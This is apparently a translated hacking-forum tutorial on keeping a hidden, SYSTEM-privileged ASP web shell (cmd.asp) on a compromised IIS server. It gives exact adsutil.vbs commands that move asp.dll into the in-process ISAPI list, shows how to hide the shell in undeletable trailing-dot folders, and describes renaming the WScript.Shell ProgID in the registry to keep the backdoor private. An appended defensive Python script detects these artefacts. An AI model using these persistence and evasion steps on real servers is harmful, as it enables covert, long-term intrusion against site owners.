For a long time we have been frustrated about making a good backdoor. The ready-made backdoor programs can hardly escape anti-virus software, and writing a backdoor for every one of these bugs seems unrealistic. Next I will teach you a way to create your own backdoor!

Required tools: one cmd.asp is enough. You can write one yourself or find one yourself; however, it is recommended that you write your own, because what you write yourself will not be killed. There is a cmd.asp with detailed notes written by myself on the CD; you can check it out!

Creation process: Assume that you have already compromised a machine. Now, let's start work! I believe everyone remembers from the original article that when the application protection in IIS is set to Low (IIS process), the ASP trojan runs with system permission! We will set it to (shared) and then still let our cmd.asp run with system permission (figure 1). This uses the adsutil.vbs tool. adsutil.vbs is a built-in tool for managing IIS, usually found in C:/inetpub/adminscripts. The specific usage of adsutil.vbs is not described here; please look it up online!

When application protection is set to Medium, lm/w3svc/inprocessisapiapps lists the ISAPIs started in the IIS process. lm/w3svc/inprocessisapiapps is an array containing a group of ISAPI paths. The ISAPIs listed there run in-process with Local System permission, while the ISAPIs started by a dllhost.exe process (launched from svchost.exe) run under the identity IWAM_<machinename>. So we need to add asp.dll to this list by hand. Note that the list cannot be appended to, it can only be overwritten!!

Run:

cscript adsutil.vbs get /w3svc/inprocessisapiapps

and look at the original values (figure 2). Then run:

cscript adsutil.vbs set /w3svc/inprocessisapiapps "C:/Windows/system32/inetsrv/httpext.dll" "C:/Windows/system32/inetsrv/httpodbc.dll" "C:/Windows/system32/inetsrv/ssinc.dll" "C:/Windows/system32/msw3prt.dll" "C:/Windows/Microsoft.net/framework/v1.1.4322/aspnet_isapi.dll" "C:/Windows/system32/inetsrv/asp.dll"

Note that the values are separated by a space, not by a carriage return! For example, see figure 3. Now the application protection setting is useless: we still have system permission!

Then let's make it so that anti-virus cannot kill it and the administrator cannot find it: put cmd.asp in a folder that cannot be opened! (Figure 4) Open the folder and you will magically find both AAA and AAA. there. (The folders were created as in figure 5; the AAA./ folder contains 1.txt.) Where did 2.txt go? In fact, when we open AAA., what actually opens is the AAA folder, and 2.txt is still in the real AAA.! This folder generally cannot be deleted! For details, refer to one of my articles: "Make aspmu not killed.txt".

Let's take advantage of this principle. We create a folder in the directory of the compromised website. Suppose it is the folder named ad; we also create ad../, and then run the copy command to copy our cmd.asp into it! Now we have a system backdoor that is not easily detected and not easily found!

I hadn't thought about this: if someone else also uploads a cmd.asp, the backdoor is no longer ours alone. No, we have to create a backdoor that belongs only to me! cmd.asp contains the following line:

Set oscript = server.Createobject("wscript.Shell")

This line is the core. Go to the registry, search for the wscript.Shell item and change it to whatever you want, such as wscript.shellshell (figure 6). Note that wscript.shell.1 should also be changed during the search, or there will be trouble! Then change

Set oscript = server.Createobject("wscript.Shell")

to

Set oscript = server.Createobject("wscript.shellshell")

OK. Copy cmd.asp to ad../ and in this way you have your own backdoor. To access the backdoor, you only need to enter http://host/ad../cmd.asp. Let's take a look (figure 7). Oh, it works!

Note: the above was done on 2003 and may be a little different on 2000, but I tested it on 2000 and it succeeded! If there are errors, come to www.cnhack.cn to discuss them with me! Thanks to tombkeeper of nsfocus.

----- Several points in this article have been made clearer for readers by the editor.
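As an added example, written from the defender's side and not part of the original article, the following Python script checks a host for the three artefacts the technique above leaves behind: asp.dll in the InProcessIsapiApps list (ASP then executes as Local System), directory names ending in a dot (which normal Win32 path handling cannot create or open), and an extra COM ProgID that resolves to the WScript.Shell CLSID under another name. All inputs are constructed samples so it runs offline; the adsutil.vbs output format, the WScript.Shell CLSID value and the ProgID map are assumptions that should be verified against the real host.

```python
"""Defensive checks for the three persistence tricks described in the article:
 1. asp.dll added to W3SVC/InProcessIsapiApps (ASP runs in-process as Local System),
 2. directories whose names end in '.' (e.g. 'ad..'), which Win32 APIs normally
    cannot create or open and which Explorer silently redirects,
 3. an extra COM ProgID that points at the WScript.Shell CLSID under another name.
All inputs below are constructed sample data. On a real host you would feed in the
output of 'cscript adsutil.vbs get W3SVC/InProcessIsapiApps', an os.listdir() of
the web root, and a dump of HKCR ProgIDs (assumed formats, not from the article).
"""
import ntpath
import re

# Constructed sample of what adsutil.vbs prints for the InProcessIsapiApps list
# (format assumed; the last entry is the one the article adds).
SAMPLE_ADSUTIL_OUTPUT = """InProcessIsapiApps : (LIST) (6 Items)
  "C:\\Windows\\system32\\inetsrv\\httpext.dll"
  "C:\\Windows\\system32\\inetsrv\\httpodbc.dll"
  "C:\\Windows\\system32\\inetsrv\\ssinc.dll"
  "C:\\Windows\\system32\\msw3prt.dll"
  "C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\aspnet_isapi.dll"
  "C:\\Windows\\system32\\inetsrv\\asp.dll"
"""

# ISAPI DLLs that are normally isolated out of process; finding one in the
# in-process list means its requests run with the IIS process's Local System token.
SUSPICIOUS_IN_PROCESS = {"asp.dll"}


def parse_adsutil_list(text):
    """Return the quoted path entries from adsutil.vbs '(LIST)' output."""
    return re.findall(r'"([^"]+)"', text)


def find_in_process_risks(text):
    """Return in-process ISAPI paths whose file name is on the suspicious set."""
    return [p for p in parse_adsutil_list(text)
            if ntpath.basename(p).lower() in SUSPICIOUS_IN_PROCESS]


# Constructed directory listing of a web root, as os.listdir() would return it.
SAMPLE_LISTING = ["images", "ad", "ad..", "AAA", "AAA.", "default.asp"]


def find_trailing_dot_names(names):
    """Names ending in '.' cannot be produced through normal Win32 path handling
    (trailing dots are stripped), so their presence indicates creation through the
    \\\\?\\ prefix or another tool that bypasses path normalisation."""
    return [n for n in names if n.endswith(".") and n not in (".", "..")]


# Constructed HKCR ProgID -> CLSID map. The WScript.Shell CLSID value is assumed;
# confirm it by reading HKCR\WScript.Shell\CLSID on the host being checked.
WSCRIPT_SHELL_CLSID = "{72C24DD5-D70A-438B-8A42-98424B88AFB8}"
SAMPLE_PROGIDS = {
    "WScript.Shell": WSCRIPT_SHELL_CLSID,
    "WScript.Shell.1": WSCRIPT_SHELL_CLSID,
    "WScript.ShellShell": WSCRIPT_SHELL_CLSID,      # the alias the article creates
    "Scripting.FileSystemObject": "{0D43FE01-F093-11CF-8940-00A0C9054228}",
}


def find_shell_aliases(progids, clsid=WSCRIPT_SHELL_CLSID):
    """Return ProgIDs that resolve to the WScript.Shell CLSID but are not one of
    the two documented names; an attacker-only alias defeats ProgID blocklists."""
    expected = {"wscript.shell", "wscript.shell.1"}
    return sorted(p for p, c in progids.items()
                  if c.upper() == clsid.upper() and p.lower() not in expected)


if __name__ == "__main__":
    print("in-process ISAPI risks:", find_in_process_risks(SAMPLE_ADSUTIL_OUTPUT))
    print("trailing-dot names:", find_trailing_dot_names(SAMPLE_LISTING))
    print("WScript.Shell aliases:", find_shell_aliases(SAMPLE_PROGIDS))
```

The three checks are deliberately independent: the in-process list is read from the metabase, the trailing-dot names from the file system, and the alias from the registry, so each one still fires if an attacker only used one part of the technique. Note that a renamed ProgID is invisible to a script that only greps ASP files for the literal string "WScript.Shell", which is why the comparison is done on the CLSID.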